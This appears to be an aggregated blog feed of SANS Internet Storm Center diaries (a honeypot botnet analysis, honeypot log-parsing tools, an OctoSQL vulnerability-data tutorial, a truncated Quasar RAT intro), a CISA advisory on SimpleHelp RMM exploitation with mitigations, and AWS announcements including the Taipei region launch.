  2. Watch for unexpected file attribute changes (especially immutable flags)
  3. Monitor for connections to known malicious IP addresses
  4. Implement file integrity monitoring for critical system files
  5. Develop and rehearse an incident response plan
  6. Maintain offline backups of critical systems and data
  7. Establish a security baseline to help identify anomalies
  8. Consider using honeypots to detect and study attack techniques

 

Conclusion: Learning from Adversaries

What makes this attack campaign particularly concerning isn't just its automation, but its global coordination. The logs reveal identical attack patterns originating from dozens of distinct IP addresses across different continents – from South America to Asia to Europe – all using the same SSH key, command sequences, and malware distribution infrastructure. This suggests we're observing a well-organised botnet operation rather than isolated opportunistic attacks.

The attackers' use of architecture-specific malware binaries (arm7, arm8, i686, x86_64) indicates they're specifically targeting the growing Internet of Things ecosystem alongside traditional servers. Most concerning is how the attackers attempt to establish persistence through multiple redundant methods like SSH backdoors with immutable attributes, crontab modifications, and likely rootkit components in the 'redtail' binaries.

For defenders, this underlines the critical importance of monitoring SSH authentication logs, implementing proper key management, and deploying behavioral analysis tools that can detect the distinctive pattern of file uploads and attribute modifications that precede full compromise. As these attack patterns continue to evolve, sharing this type of detailed analysis becomes increasingly valuable for the broader security community.

This honeypot capture represents a valuable learning opportunity. The attackers demonstrated an automated approach to system compromise, using multiple fallback mechanisms and persistence techniques. They came prepared with malware variants for different architectures and took steps to hide their activities.

The complexity and automation in this attack highlight an important reality of modern cybersecurity: many attacks are not targeted but opportunistic, using automated tools to scan for and exploit vulnerable systems at scale. A single exposed system with weak credentials can be discovered and compromised within minutes. By studying these attacks in controlled environments, we can better understand adversary techniques and improve our defensive postures. The honeypot serves not just as a detection mechanism but as a cybersecurity training tool, providing real-world examples of the threats systems face daily.

This comprehensive attack analysis was created entirely using Notion as my central workspace before exporting to PDF. Notion's flexible database capabilities made organising and parsing through the complex honeypot logs significantly more efficient.

For anyone conducting similar security research, Notion offers a surprisingly powerful environment for both collaborative analysis and professional report preparation [7].

 

[1] https://www.sans.edu/cyber-security-programs/bachelors-degree/
[2] https://isc.sans.edu/honeypot.html
[3] https://www.virustotal.com/gui/file/2ef6bb55a79d81fbda6d574456a8c187f610c5ae2ddca38e32cf7cc50912b0bf
[4] https://www.virustotal.com/gui/file/fc8730fbe87bcbdc093a1ffbcb0028ccb4c24638e55d13fd853b07574f4cbe4a
[5] https://www.virustotal.com/gui/file/7780e72f7dea978946d4615c8db1b239d3e2c742cfc8be2934006b1fd6071110
[6] https://www.virustotal.com/gui/file/b6ee8e08f1d4992ca85770e6883c1d2206ebbaf42f99d99aba0e26278de8bffb
[7] https://www.notion.so

 


Jesse La Grew
Handler

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Security

Ransomware Actors Exploit Unpatched SimpleHelp Remote Monitoring and Management to Compromise Utility Billing Software Provider

Leave a comment
This post was originally published on this site

Summary

The Cybersecurity and Infrastructure Security Agency (CISA) is releasing this advisory in response to ransomware actors leveraging unpatched instances of a vulnerability in SimpleHelp Remote Monitoring and Management (RMM) to compromise customers of a utility billing software provider. This incident reflects a broader pattern of ransomware actors targeting organizations through unpatched versions of SimpleHelp RMM since January 2025.

SimpleHelp versions 5.5.7 and earlier contain several vulnerabilities, including CVE-2024-57727—a path traversal vulnerability.1 Ransomware actors likely leveraged CVE-2024-57727 to access downstream customers’ unpatched SimpleHelp RMM for disruption of services in double extortion compromises.1 

CISA added CVE-2024-57727 to its Known Exploited Vulnerabilities (KEV) Catalog on Feb. 13, 2025.

CISA urges software vendors, downstream customers, and end users to immediately implement the Mitigations listed in this advisory based on confirmed compromise or risk of compromise.

Download the PDF version of this report:

AA25-163A Ransomware Actors Exploit Unpatched SimpleHelp Remote Monitoring and Management to Compromise Utility Billing Software Provider
(PDF, 420.49 KB
)

Mitigations

CISA recommends organizations implement the mitigations below to respond to emerging ransomware activity exploiting SimpleHelp software. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s CPGs webpage for more information on the CPGs, including additional recommended baseline protections. These mitigations apply to all critical infrastructure organizations.

Vulnerable Third-Party Vendors

If SimpleHelp is embedded or bundled in vendor-owned software or if a third-party service provider leverages SimpleHelp on a downstream customer’s network, then identify the SimpleHelp server version at the top of the file <file_path>/SimpleHelp/configuration/serverconfig.xml. If version 5.5.7 or prior is found or has been used since January 2025, third-party vendors should:

  1. Isolate the SimpleHelp server instance from the internet or stop the server process.
  2. Upgrade immediately to the latest SimpleHelp version in accordance with SimpleHelp’s security vulnerability advisory.2
  3. Contact your downstream customers to direct them to take actions to secure their endpoints and undertake threat hunting actions on their network.

Vulnerable Downstream Customers and End Users

Determine if the system is running an unpatched version of SimpleHelp RMM either directly or embedded in third-party software.

SimpleHelp Endpoints

Determine if an endpoint is running the remote access (RAS) service by checking the following paths depending on the specific environment:

  • Windows: %APPDATA%JWrapper-Remote Access
  • Linux: /opt/JWrapper-Remote Access
  • MacOs: /Library/Application Support/JWrapper-Remote Access

If RAS installation is present and running, open the serviceconfig.xml file in <file_path>/JWrapper-Remote Access/JWAppsSharedConfig/ to determine if the registered service is vulnerable. The lines starting with <ConnectTo indicate the server addresses where the service is registered.

SimpleHelp Server

Determine the version of any SimpleHelp server by performing an HTTP query against it. Add /allversions (e.g., https://simple-help.com/allversions) to query the URL for the version page. This page will list the running version.

If an unpatched SimpleHelp version 5.5.7 or earlier is confirmed on a system, organizations should conduct threat hunting actions for evidence of compromise and continuously monitor for unusual inbound and outbound traffic from the SimpleHelp server. Note: This is not an exhaustive list of indicators of compromise.

  1.  Refer to SimpleHelp’s guidance to determine compromise and next steps.3
  2. Isolate the SimpleHelp server instance from the internet or stop the server process.
  3. Search for any suspicious or anomalous executables with three alphabetic letter filenames (e.g., aaa.exe, bbb.exe, etc.) with a creation time after January 2025. Additionally, perform host and network vulnerability security scans via reputable scanning services to verify malware is not on the system.
  4. Even if there is no evidence of compromise, users should immediately upgrade to the latest SimpleHelp version in accordance with SimpleHelp’s security vulnerabilities advisory.4

If your organization is unable to immediately identify and patch vulnerable versions of SimpleHelp, apply appropriate workarounds. In this circumstance, CISA recommends using other vendor-provided mitigations when available. These non-patching workarounds should not be considered permanent fixes and organizations should apply the appropriate patch as soon as it is made available.

Encrypted Downstream Customers and End Users

If a system has been encrypted by ransomware:

  1. Disconnect the affected system from the internet.
  2. Use clean installation media (e.g., a bootable USD drive or DVD) to reinstall the operating system. Ensure the installation media is free from malware.
  3. Wipe the system and only restore data from a clean backup. Ensure data files are obtained from a protected environment to avoid reintroducing ransomware to the system.

CISA urges you to promptly report ransomware incidents to a local FBI Field Office, FBI’s Internet Crime Compliant Center (IC3), and CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870).

Proactive Mitigations to Reduce Risk

To reduce opportunities for intrusion and to strengthen response to ransomware activity, CISA recommends customers of vendors and managed service providers (MSPs) implement the following best practices:

  • Maintain a robust asset inventory and hardware list [CPG 1.A].
  • Maintain a clean, offline backup of the system to ensure encryption will not occur once reverted. Conduct a daily system backup on a separate, offline device, such as a flash drive or external hard drive. Remove the device from the computer after backup is complete [CPG 2.R].
  • Do not expose remote services such as Remote Desktop Protocol (RDP) on the web. If these services must be exposed, apply appropriate compensating controls to prevent common forms of abuse and exploitation. Disable unnecessary OS applications and network protocols on internet-facing assets [CPG 2.W].
  • Conduct a risk analysis for RMM software on the network. If RMM is required, ask third-party vendors what security controls are in place.
  • Establish and maintain open communication channels with third-party vendors to stay informed about their patch management process.
  • For software vendors, consider integrating a Software Bill of Materials (SBOM) into products to reduce the amount of time for vulnerability remediation.
    • An SBOM is a formal record of components used to build software. SBOMs enhance supply chain risk management by quickly identifying and avoiding known vulnerabilities, identifying security requirements, and managing mitigations for vulnerabilities. For more information, see CISA’s SBOM page.

Resources

Reporting

Your organization has no obligation to respond or provide information back to FBI in response to this advisory. If, after reviewing the information provided, your organization decides to provide information to FBI, reporting must be consistent with applicable state and federal laws.

FBI is interested in any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with threat actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.

Additional details of interest include a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host- and network-based indicators.

CISA and FBI do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI and CISA urge you to promptly report ransomware incidents to FBI’s Internet Crime Complain Center (IC3), a local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center (report@cisa.gov) or by calling 1-844-Say-CISA (1-844-729-2472).

SimpleHelp users or vendors can contact support@simple-help.com for assistance with queries or concerns.

Disclaimer

The information in this report is being provided “as is” for informational purposes only. CISA does not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favor by CISA.

Version History

June 12, 2025: Initial version.

Notes

1. Anthony Bradshaw, et. al., “DragonForce Actors Target SimpleHelp Vulnerabilities to Attack MSP, Customers,” Sophos News, May 27, 2025, https://news.sophos.com/en-us/2025/05/27/dragonforce-actors-target-simplehelp-vulnerabilities-to-attack-msp-customers/.
2. For instructions for upgrading to the latest version of SimpleHelp, see SimpleHelp’s security vulnerability advisory.
3. To determine possibility of compromise and next steps, see SimpleHelp’s guidance.
4. For instructions for upgrading to the latest version of SimpleHelp, see SimpleHelp’s security vulnerability advisory.

Security

Automated Tools to Assist with DShield Honeypot Investigations [Guest Diary], (Wed, Jun 11th)

Leave a comment
This post was originally published on this site

[This is a Guest Diary by William Constantino, an ISC intern as part of the SANS.edu BACS program]

In the beginning of my Internet Storm Center (ISC) internship, I wasted too much time trying to build my SIEM from an old computer I had lying around, or a new Raspberry Pi I purchased. I keep running into roadblocks and errors. Also, I was distracted while trying to finish up another course, and I had every intention of looking at my log files every day, but it wasn’t happening. I did the easy thing of saying “I’ll look at it tomorrow. The JSON logs and Sqlite3 were the other problems with reading the logs without a SIEM, it produced massive amounts of data to parse through. To me it was like trying to find a needle in a haystack. To resolve this problem, I built two automated python tools to assist with those tasks and analyze the data. 

The first tool helped me process and organize the data I was looking at and helped point me in the right direction of interesting things to investigate further. This tool gave me the following capabilities:

  1. It loads, reads, and parses JSON files by extracting the source IP addresses, request methods, accessed URLs, timestamps, user agents, response codes, credentials, and hashes.
  2. Tracks IP activity by recording the different request methods used (GET, POST, etc.), and it stores the timestamps of requests for timeline analysis.
  3. Counts URL accesses for identifying the most frequently visited endpoints, logs the user agent strings to detect patterns in client access, and captures the response codes to track server errors or unusual behavior.
  4. Detects suspicious activity by flagging suspicious file requests (.php, .exe, .zip, etc.), extracts credential attempts (20 of the most used usernames and passwords), and identifies hashed values (MD5, SHA1, CRC32, NTLM, etc.)
  5. Generates a generic security report by reporting the top 10 most active IPs, bottom 10 least active IPs, and the total amount of Unique IPs. It gives a summary of total requests, detected hashes, and credential attempts.
  6. Lastly it measures how long the script takes to process the log file. It displays the results in minutes and seconds (I added this last because I just wanted to know how long it was taking to read and parse through the data).
  7. The sample output from this tool is from 2025-05-31, and it was a massive log file at over 3.5GB for one day (why I added the timer). I will break down the output in sections for Tool 1 below:

Figure 1: Top 10 most Active IP addresses, Bottom 10 Least Active IPs, and General Summary.

Continued Output Tool 1:


Figure 2: The Request Methods Used and Top Accessed URLs.

Continued Output Tool 1: 


Figure 3: Suspicious File Requests and Top User-Agent Strings.

Continued Output Tool 1: 


Figure 4: Top attempted usernames and attempted passwords.

Continued Output Tool 1:
 

Figure 5: Hashes Detected and the Time it took to read the log file.

Once I had this output to look at, I determine what IP address that is the most interesting. However, I usually start with the one with the largest number of requests to see what is going on. I will look at all 10-20 (Top and Bottom 10) individually and see what they were doing and then determine which IP address to highlight for my analysis. Sometimes, if I’m looking at the same exploit, I’ll research all the other IPs to see if there is a novel attack or a different type of attack. To assist with a further investigation, I developed a second tool to help me with this. It is basically, the same as the first tool, but it focuses on further detailed analysis of specific IP(s).

The second python tool performs a detailed analysis on a specific IP address or addresses that you want further analysis on from a given a JSON log file. This tool does the following things:

  1. Provides a prompt to input one (1) or multiple IP addresses.
  2. It extracts the “sip” (source IP) field from each log entry and identifies requests.
  3. The script gathers the HTTP request methods used by the target IP (GET, POST, HEAD, etc.). It also records the timestamps of the request timeframe.
  4. Analyzes the User-Agent Strings which can provide insight into whether the requests originated from a legitimate browser, automated bot, or a hacking tool.
  5. Examines response codes to show whether the target IP successfully accessed certain resources.
  6. Detects suspicious file requests (.php, .exe, .zip, .bat, .sh, .py)
  7. Credential attempts using default usernames and passwords (currently only the top twenty of each). 

Below is my output for the second tool (also for 2025-05-31). It is basically, the same as the first tool, but it focuses on further detailed analysis of specific IPs.

Output Tool 2:


Figure 6: Prompt to enter one (1) IP or multiple IP addresses separated by a comma.

Continued output Tool 2:


Figure 7: I inputted IP address (141.98.80.134). In this case, it was the #1 active IP.

Continued output of Tool 2:


Figure 8: Analysis for IP (141.98.80.134) with a massive number of requests.
 
According to the top accessed URLs in this investigation of this IP are known for CVE-2021-20016. I’ve actually seen this type of attack lately. 


Figure 9: Internet Storm Center Report for an exploit for Sonicwall [1].

Continued output of Tool 2:


Figure 10: User-Agent Strings and Attempted Passwords. 

This script will notify if it did not find any data for the specific fields looked at. The first tool does not do this, but usually there are all types of data and no field is empty during the investigation.

Continued output of Tool 2:


Figure 11: The Log Analysis is Complete. 

It took almost 13 minutes to complete. This was a massive file compared to other days, so analysis will be much faster with less data.
Using this tool to analyze the data in a short amount of time, the analyst will be able to inquire more information about the IP from websites like Virustotal, IPQualityScore, APIVoid, and etc. That information might give additional data points to see if further investigation is warranted or not.

In Conclusion, my script(s) or python tool(s) can assist help detect potential attackers that are targeting their DShield Honeypot. The tools can assist in forensic analysis by tracking IP behavior, login attempts, suspicious files, and other types of data. Additionally, they can provide insights into common attack patterns and methods that could be used by malicious actors. Moreover, other students or individuals can benefit from using these tools for their analysis and attack observations. This is only the starting point for these tools, massive improvements can be made to make them even more effective and useful. In the short term, though, these tools significantly assisted in my analysis projects during this internship. I have attached the links to my GitHub for both tools below.

[1] https://isc.sans.edu/diary/31906
[2] https://github.com/JJWCons/log-scripts/blob/main/logfile_investigation.py (Tool 1 Code)
[3] https://github.com/JJWCons/log-scripts/blob/main/single_multi_IP.py (Tool 2 Code)
[4] https://www.sans.edu/cyber-security-programs/bachelors-degree/

———–
Guy Bruneau IPSS Inc.
My GitHub Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Security

Quasar RAT Delivered Through Bat Files, (Wed, Jun 11th)

Leave a comment
This post was originally published on this site

RAT's are popular malware. They are many of them in the wild, Quasar[1] being one of them. The malware has been active for a long time and new campaigns come regularly back on stage. I spotted an interesting .bat file (Windows script) that attracted my attention because it is very well obfuscated. This file is a second stage that is downloaded and launched from a simple script:

AWS

AWS Weekly Roundup: New AWS Heroes, Amazon Q Developer, EC2 GPU price reduction, and more (June 9, 2025)

Leave a comment
This post was originally published on this site

The AWS Heroes program recognizes a vibrant, worldwide group of AWS experts whose enthusiasm for knowledge-sharing has a real impact within the community. Heroes go above and beyond to share knowledge in a variety of ways in developer community. We introduce our newest AWS Heroes in the second quarter of 2025.

To find and connect with more AWS Heroes near you, visit the categories in which they specialize Community Heroes, Container Heroes, Data Heroes, DevTools Heroes, Machine Learning Heroes, Security Heroes, and Serverless Heroes.

Last week’s launches
In addition to the inspiring celebrations, here are some AWS launches that caught my attention.

For a full list of AWS announcements, be sure to keep an eye on What’s New at AWS.

Other AWS news
Here are some additional projects, blog posts that you might find interesting:

  • Up to 45 percent price reduction for Amazon EC2 NVIDIA GPU-accelerated instances – AWS is reducing the price of NVIDIA GPU-accelerated Amazon EC2 instances (P4d, P4de, P5, and P5en) by up to 45 percent for On-Demand and Savings Plan usage. We are also making the very new P6-B200 instances available through Savings Plans to support large-scale deployments.
  • Introducing public AWS API models – AWS now provides daily updates of Smithy API models on GitHub, enabling developers to build custom SDK clients, understand AWS API behaviors, and create developer tools for better AWS service integration.
  • The AWS Asia Pacific (Taipei) Region is now open – The new Region provides customers with data residency requirements to securely store data in Taiwan while providing even lower latency. Customers across industries can benefit from the secure, scalable, and reliable cloud infrastructure to drive digital transformation and innovation.
  • Amazon EC2 has simplified the AMI cleanup workflow – Amazon EC2 now supports automatically deleting underlying Amazon Elastic Block Store (Amazon EBS) snapshots when deregistering Amazon Machine Images (AMIs).
  • The Lab where AWS designs custom chips – Visit Annapurna Labs in Austin, Texas—a combination of offices, workshops, and even a mini data center—where Amazon Web Services (AWS) engineers are designing the future of computing.

Upcoming AWS events
Check your calendars and sign up for these upcoming AWS events.

  • Join re:Inforce from anywhere – If you aren’t able to make it to Philadelphia (June 16–18), tune in remotely. Get free access to the re:Inforce keynote and innovation talks live as they happen.
  • AWS Summits – Join free online and in-person events that bring the cloud computing community together to connect, collaborate, and learn about AWS. Register in your nearest city: Shanghai (June 19 – 20), Milano (June 18), Mumbai (June 19) and Japan (June 25 – 26).
  • AWS re:Invent – Mark your calendars for AWS re:Invent (December 1 – 5) in Las Vegas. Registration is now open
  • AWS Community Days – Join community-led conferences that feature technical discussions, workshops, and hands-on labs led by expert AWS users and industry leaders from around the world: Mexico (June 14), Nairobi, Kenya (June 14) and Colombia (June 28)

That’s all for this week. Check back next Monday for another Weekly Roundup!

– Betty

Security

OctoSQL & Vulnerability Data, (Sun, Jun 8th)

Leave a comment
This post was originally published on this site

As an avid daily reader of TLDR Information Security I benefit twofold. First, I gain interesting insights and recommendations regarding launches and tools, where I first learned about OctoSQL. Second, concerning vulnerability details inevitably land in my inbox on a near daily basis. Aside from my recommendation to join the TLDR InfoSec mailing list, diary readers also benefit twofold as, herein, I share the use of OctoSQL as a fast CLI interface to vulnerability data aggregated via CVE-Vulnerability-Information-Downloader. If ever you’ve wanted to join vulnerability data (CVE, CVSS, EPSS, etc) from disparate data sources and file types, this is the diary for you.

The 03 JUN 2025 edition of TLDR InfoSec brought us details on Qualcomm’s three patched zero-day vulnerabilities in its Adreno GPU driver that are being actively exploited in targeted attacks. Per the TLDR InfoSec issue, CVE-2025-21479 and CVE-2025-21480 cause memory corruption through unauthorized GPU command execution while CVE-2025-27038 is a use-after-free vulnerability in Chrome’s graphics rendering. “Google’s Threat Analysis Group (TAG) confirmed these vulnerabilities are under limited, targeted exploitation, and Qualcomm provided patches to device manufacturers in May with urgent deployment recommendations.” There has been a pattern of Qualcomm chipset vulnerabilities being exploited by threat actors, including a previous zero-day used adversially with Cellebrite software to unlock activists’ and journalists’ Android devices.[1]
While this reference was an effective summary of the issues, it did not contain vulnerabilty stats with which to assess severity and exploitability.
One of my favorite raw data source aggregators for such details is the CVE-Vulnerability-Information-Downloader. With updated a data and OctoSQL in hand, a few useful SQL queries later, we’ll know everything we need. Yes, you can also search web sources, but you may have production scenarios with limited egress access coupled with the need an for easily extensible full-blown dataflow engine which can be used to add a SQL interface to your own applications.

Be sure Docker or the like (Rancher Desktop) are available, and acquire a NVD API key if you don’t already have one. In your preferred data or tools directory:

git clone https://github.com/trinitor/CVE-Vulnerability-Information-Downloader.git
cd CVE-Vulnerability-Information-Downloader
cp env_example .env

Edit the .env file and add your NVD API key, then run:

docker compose up -d  
docker exec -it vulnerability-tables-cron bash /opt/scripts/download.sh

Note that the docker exec download process can take up to twenty minutes to finish. Be patient, don’t panic. 😉
This will populate the CVE-Vulnerability-Information-Downloader/data/vulnerability-tables-cron/output directory of your installation CSV and JSON versions of CISA Known Exploited Vulnerabilities (KEV) catalogCVECVSS, and EPSS files. This nicely sets up our situation, albeit arbitrary, where we’d like to query these disparate data file types and join key elements such as known exploitation and EPSS score for specific CVEs.
Here’s where OctoSQL provides capably. I installed OctoSQL on Ubuntu 25.04 with brew:

brew install cube2222/octosql/octosql

The OctoSQL binary is available via any path after installing via brew, it’s my preferred one-shot approach.
Just cd to CVE-Vulnerability-Information-Downloader/data/vulnerability-tables-cron/output and you’re ready to go.
I first crafted a query to return all the Qualcomm CVEs in CISA’s KEV (CISA_known_exploited.csv) catalog to validate the assertion that there has been a pattern of Qualcomm chipset vulnerabilities being exploited by threat actors.

octosql "SELECT vendorProject, product, CVE, dateAdded FROM CISA_known_exploited.csv WHERE vendorProject='Qualcomm'"

Qualcomm KEV

Figure 1: Qualcomm CVEs in KEV catalog

The assertion is valid, as seen in Figure 1: Qualcomm vulnerabilities have indeed been victim to active exploitation in the wild.
What about the three currently referenced CVEs CVE-2025-21480, 21479, and 27038? If already known to be exploited, what is the probability of exploitation per EPSS?

A query to join CISA’s KEV (CISA_known_exploited.csv) and FIRST’s EPSS.json follows:

octosql "SELECT                        
    c.CVE,
    c.vendorProject,
    c.product,
    c.vulnerabilityName,
    c.dateAdded,
    e.EPSS
FROM
    CISA_known_exploited.csv AS c
INNER JOIN
    EPSS.json AS e
ON
    c.CVE = e.CVE
WHERE CVE='CVE-2025-21480' OR CVE='CVE-2025-21479' OR CVE='CVE-2025-27038'"

Qualcomm EPSS

Figure 2: KEV & EPSS join for Qualcomm CVEs

As seen in Figure 2, those are low EPSS scores, indicating a rather low probability of exploitation. What about all the other known exploited Qualcomm CVEs? Here again I join KEV Catalog results with EPSS to answer the question with results produced in descending order by EPSS score.

octosql "SELECT                        
    c.CVE,
    c.vendorProject,
    c.product,
    c.vulnerabilityName,
    c.dateAdded,
    e.EPSS
FROM
    CISA_known_exploited.csv AS c
INNER JOIN
    EPSS.json AS e
ON
    c.CVE = e.CVE
WHERE vendorProject='Qualcomm' ORDER BY EPSS DESC"

Qualcomm All KEV

Figure 3: Qualcomm KEV entries by EPSS rank

Turns out the highest scoring Qualcomm CVE is one the current three of interest, CVE-2025-27038, with a score of only 0.16672 as seen in Figure 3.
What does it all mean?
Per Jay Jacobs of Cyentia, EPSS is driven by data and has a strong temporal aspect. It only learns from the exploitation activity it sees (from data partners) and predicts on the vulnerability attributes presented. Those with low EPSS scores on the KEV are more likely to be “Access Vector:Local”, “Confidentiality:None”, require some privileges and/or be without published exploit code. Those with higher EPSS scores tend to have exploit code published, be integrated into pen testing tools and scanners, and/or involve remote command execution/injection. Likelihood of exploitation for these Qualcomm vulns is low due to “Access Vector:Local” above all else.
One additional excellent feature offered by OctoSQL is the ability to explain query plans. As you build complex queries, and potentially productionize them, explainability will be important. Rerunning our last query with the –explain flag set yields an informative visualization as seen in Figure 4. Setting it to 1 produces a query plan without type and schema information, while setting it to 2 includes type and schema. I use 1 here for visual clarity.

octosql "SELECT                        
    c.CVE,
    c.vendorProject,
    c.product,
    c.vulnerabilityName,
    c.dateAdded,
    e.EPSS
FROM
    CISA_known_exploited.csv AS c
INNER JOIN
    EPSS.json AS e
ON
    c.CVE = e.CVE
WHERE vendorProject='Qualcomm' ORDER BY EPSS DESC" --explain 1

OctoSQL Explain

Figure 4:

I’ve barely scratched the surface of its potential use cases here, but I’ve incorporated OctoSQL into my personal practice, and truly appreciate the ability to query disparate sources in my terminal. I also appreciate the ability to download vulnerability data use the information for enrichment courtesy of the CVE Vulnerability Information Downloader. Please consider both of these offerings for your on purpose and benefit.

Cheers…until next time.

Russ McRee | @holisticinfosec | infosec.exchange/@holisticinfosec | LinkedIn.com/in/russmcree

References

[1] Prasanna Gautam, Eric Fernandez & Sammy Tbeile, TLDR Information Security, 03 JUN 2025
[2] Jay Jacobs, Why does EPSS score some CVEs on the KEV so low?, https://www.cyentia.com/integrating-epss-and-kev, retrieved 05 JUN 2025

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

AWS

Now open – AWS Asia Pacific (Taipei) Region

Leave a comment
This post was originally published on this site

Today, Amazon Web Services (AWS) announced that AWS Asia Pacific (Taipei) Region is generally available with three Availability Zones and Region code ap-east-2. The new Region brings AWS infrastructure and services closer to customers in Taiwan.

Skyline of Taipei including the Taipei 101 building

Skyline of Taipei including the Taipei 101 building

As the first infrastructure Region in Taipei and the fifteenth Region in Asia Pacific, the new Region expands the AWS global footprint to 117 Availability Zones across 37 geographic Regions worldwide. The new AWS Region will help developers, startups, and enterprises, as well as education, entertainment, financial services, healthcare, manufacturing, and nonprofit organizations run their applications and serve end users while maintaining data residency in Taiwan.

AWS in Taiwan

AWS has maintained a presence in Taiwan for more than a decade, starting with the opening of the AWS Taipei office in 2014. Since then, AWS has introduced many infrastructure offerings in Taiwan including:

In 2014, AWS launched the first Amazon CloudFront edge location and added another in 2018, offering customers a secure and efficient content delivery network for accelerating data, video, application, and API delivery worldwide.

In 2018, AWS established two AWS Direct Connect locations in Taiwan to enhance connectivity options. With the launch of the AWS Asia Pacific (Taipei) Region, we’ve added a new Direct Connect location in Taiwan to provide customers with higher speed and bandwidth.

In 2020, AWS launched AWS Outposts in Taiwan, helping customers seamlessly extend AWS infrastructure and services to their on-premises or edge locations for a consistent hybrid experience.

In 2022, AWS launched AWS Local Zone in Taipei to support low-latency applications requiring single-digit millisecond responsiveness.

Today, with the launch of the AWS Asia Pacific (Taipei) Region, we further strengthen our commitment to support innovation in Taiwan. Organizations in regulated industries will be able to store data locally while maintaining complete control over data location and movement. From high-tech manufacturing to semiconductor companies and small and medium enterprises (SMEs), businesses will gain access to the scalable infrastructure needed for growth and innovation.

AWS customers in Taiwan

Organizations across Taiwan are already using AWS to innovate and deliver differentiated experiences to their customers, for example:

Cathay Financial Holdings (CFH) is a leader in financial technology in Taiwan. It continuously introduces the latest technology to create a full-scenario financial service ecosystem. Since 2021, CFH has built a cloud environment on AWS that strengthens its security control and meets compliance requirements.

“Cathay Financial Holdings will continue to accelerate digital transformation in the industry, also improve the stability, security, timeliness, and scalability of our financial services,” said Marcus Yao, senior executive vice president of CFH. “With the new AWS Region in Taiwan, CFH is expected to provide customers with even more diverse and convenient financial services.”

Gamania Group is revolutionizing the entertainment landscape by integrating AI with celebrity IP through their innovative Vyin AI platform. Gamania utilized the robust and scalable infrastructure of AWS to develop secure, responsive AI interactions.

Benjamin Chen, chief strategy officer and head of Innovation Lab, said: “The core goal of Vyin AI is to create a digital identity that is fully interactive, lifelike, and safe to use. This demands technologies that are stable, responsive, and secure. To that end, we rely on the robust and resilient cloud infrastructure of AWS, and look forward to the low-latency advantages offered by the AWS Region in Taiwan. AWS provides a highly stable and secure environment for Vyin AI to provide users with secure and AI hallucination free interactions. AWS Cloud services allow us to focus more on core AI technology innovation and the enhancement of the ‘hyper-personalized interactive’ user experience, thereby accelerating product iteration and optimization.”

Chunghwa Telecom is a leader in cloud network services in Taiwan with the broadest mainstream 5G bandwidth, exceptional network speed, and globally recognized mobile internet capabilities. Chunghwa Telecom utilizes generative AI platforms such as Amazon Bedrock to build innovative services and create intelligent applications for various industries.

Dr. Rong-Shy Lin, president of CHT, stated: “With the launch of the AWS Region in Taiwan, CHT’s partnership with AWS has entered a new phase. We will deepen the integration of key advantages of the AWS Region, such as low latency and local data storage, combining them with CHT’s extensive backbone network, rich cloud experience, and professional team that has obtained multiple AWS Competency certifications. This will allow CHT to provide solutions that meet strict security and compliance requirements for government, financial, critical infrastructure, and highly regulated industries. At the same time, we are utilizing AWS technologies such as Amazon Bedrock to develop innovative applications and accelerate digital transformation and AI adoption. We will continue to provide optimized cloud and network services in Taiwan while supporting customers’ global expansion.”

AWS Partners in Taiwan

The AWS Partner Network in Taiwan plays a crucial role in helping customers adopt cloud technologies and maximize value from the new AWS Asia Pacific (Taipei) Region. These specialized partners combine deep technical expertise with local market knowledge to accelerate digital transformation across industries.

eCloudvalley Digital Technology Group is an AWS Premier Tier Services Partner with a team of cloud experts with more than 600 certifications.

“eCloudvalley Group has always embraced our mission of being a cloud evangelist, driving the adoption of cloud technology across Taiwan’s industries,” said MP Tsai, chairman of eCloudvalley Group. “With over a decade of close collaboration with AWS, we are honored to help more and more customers and industries move to the cloud while being part of customers’ digital transformation journey on AWS. We believe that the launch of the AWS Asia Pacific (Taipei) Region will further support Taiwan companies’ digital transformation and innovation in Taiwan with its world-leading cloud technology, while industries with higher local data residency requirements, such as finance and healthcare, will be able to further advance their cloud transformation journey.”

Nextlink Technology Inc. is an AWS Premier Consulting Partner, certified Managed Service Provider (MSP) and has AWS Level 1 Managed Security Service Provider (MSSP) and Government Consulting Competency.

“The investment of AWS in local infrastructure will help drive the digital transformation of Taiwan companies, boosting the development of various industries spanning from traditional industries to emerging digital sectors,” said Shasta Ho, the CEO of Nextlink Technology Inc. “We look forward to continuing working with AWS to help enterprises across industries deeply utilize the new AWS Asia Pacific (Taipei) Region. This local advantage will address customer needs in data localization, low latency, compliance, and high performance computing workloads. We also look forward to using AWS world-leading cloud technologies to power customers’ digital transformation journeys while contributing to the diversification of Taiwan’s economy.”

SAP has been a strategic partner of AWS for more than a decade, with thousands of enterprise customers worldwide running their SAP workloads on AWS.

“SAP is thrilled to see AWS establish new data centers in Taiwan,” said George Chen, SAP global vice president and managing director for Taiwan, Hong Kong, and Macau. “This investment provides Taiwan enterprises with greater choice, lower service latency, and enhanced operational flexibility. As a long-term strategic partner, SAP is committed to accelerating cloud transformation for these businesses. Through RISE with SAP, we can help customers seamlessly migrate to the cloud, enjoying greater flexibility, scalability, and reduced operational costs. By combining SAP’s enterprise solutions with the robust cloud platform of AWS, we’ll jointly empower Taiwan’s enterprises to unlock innovative AI applications and run their core businesses securely and reliably locally, driving Taiwan enterprise cloud transformation together.”
